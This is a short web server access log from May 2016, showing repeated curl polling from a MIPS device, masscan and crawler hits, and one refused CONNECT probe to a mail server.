212.91.214.213 - - [14/May/2016:10:47:31 +0200] "GET / HTTP/1.1" 200 1229 "-" "curl/7.17.1 (mips-unknown-linux-gnu) libcurl/7.17.1 OpenSSL/0.9.8i zlib/1.2.3"
212.91.214.213 - - [14/May/2016:10:47:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "curl/7.17.1 (mips-unknown-linux-gnu) libcurl/7.17.1 OpenSSL/0.9.8i zlib/1.2.3"
212.91.214.213 - - [14/May/2016:10:47:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "curl/7.17.1 (mips-unknown-linux-gnu) libcurl/7.17.1 OpenSSL/0.9.8i zlib/1.2.3"
212.91.214.213 - - [14/May/2016:10:47:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "curl/7.17.1 (mips-unknown-linux-gnu) libcurl/7.17.1 OpenSSL/0.9.8i zlib/1.2.3"
212.91.214.213 - - [14/May/2016:10:48:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "curl/7.17.1 (mips-unknown-linux-gnu) libcurl/7.17.1 OpenSSL/0.9.8i zlib/1.2.3"
212.91.214.213 - - [14/May/2016:10:48:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "curl/7.17.1 (mips-unknown-linux-gnu) libcurl/7.17.1 OpenSSL/0.9.8i zlib/1.2.3"
212.91.214.213 - - [14/May/2016:10:48:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "curl/7.17.1 (mips-unknown-linux-gnu) libcurl/7.17.1 OpenSSL/0.9.8i zlib/1.2.3"
212.91.214.213 - - [14/May/2016:10:48:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "curl/7.17.1 (mips-unknown-linux-gnu) libcurl/7.17.1 OpenSSL/0.9.8i zlib/1.2.3"
212.91.214.214 - - [14/May/2016:10:55:28 +0200] "GET / HTTP/1.1" 200 1229 "-" "curl/7.17.1 (mips-unknown-linux-gnu) libcurl/7.17.1 OpenSSL/0.9.8i zlib/1.2.3"
212.91.214.214 - - [14/May/2016:10:55:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "curl/7.17.1 (mips-unknown-linux-gnu) libcurl/7.17.1 OpenSSL/0.9.8i zlib/1.2.3"
212.91.214.214 - - [14/May/2016:10:55:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "curl/7.17.1 (mips-unknown-linux-gnu) libcurl/7.17.1 OpenSSL/0.9.8i zlib/1.2.3"
212.91.214.214 - - [14/May/2016:10:55:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "curl/7.17.1 (mips-unknown-linux-gnu) libcurl/7.17.1 OpenSSL/0.9.8i zlib/1.2.3"
61.228.91.150 - - [14/May/2016:10:55:55 +0200] "CONNECT 163mx03.mxmail.netease.com:25 HTTP/1.0" 405 355 "-" "-"
212.91.214.214 - - [14/May/2016:10:56:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "curl/7.17.1 (mips-unknown-linux-gnu) libcurl/7.17.1 OpenSSL/0.9.8i zlib/1.2.3"
212.91.214.214 - - [14/May/2016:10:56:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "curl/7.17.1 (mips-unknown-linux-gnu) libcurl/7.17.1 OpenSSL/0.9.8i zlib/1.2.3"
212.91.214.214 - - [14/May/2016:10:56:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "curl/7.17.1 (mips-unknown-linux-gnu) libcurl/7.17.1 OpenSSL/0.9.8i zlib/1.2.3"
212.91.214.214 - - [14/May/2016:10:56:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "curl/7.17.1 (mips-unknown-linux-gnu) libcurl/7.17.1 OpenSSL/0.9.8i zlib/1.2.3"
212.91.214.214 - - [14/May/2016:10:56:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "curl/7.17.1 (mips-unknown-linux-gnu) libcurl/7.17.1 OpenSSL/0.9.8i zlib/1.2.3"
212.91.214.214 - - [14/May/2016:10:56:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "curl/7.17.1 (mips-unknown-linux-gnu) libcurl/7.17.1 OpenSSL/0.9.8i zlib/1.2.3"
69.30.202.230 - - [14/May/2016:12:34:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
94.102.52.47 - - [14/May/2016:12:49:43 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
94.102.52.47 - - [14/May/2016:12:50:13 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
51.255.207.27 - - [14/May/2016:12:50:16 +0200] "GET /robots.txt HTTP/1.0" 404 323 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)"
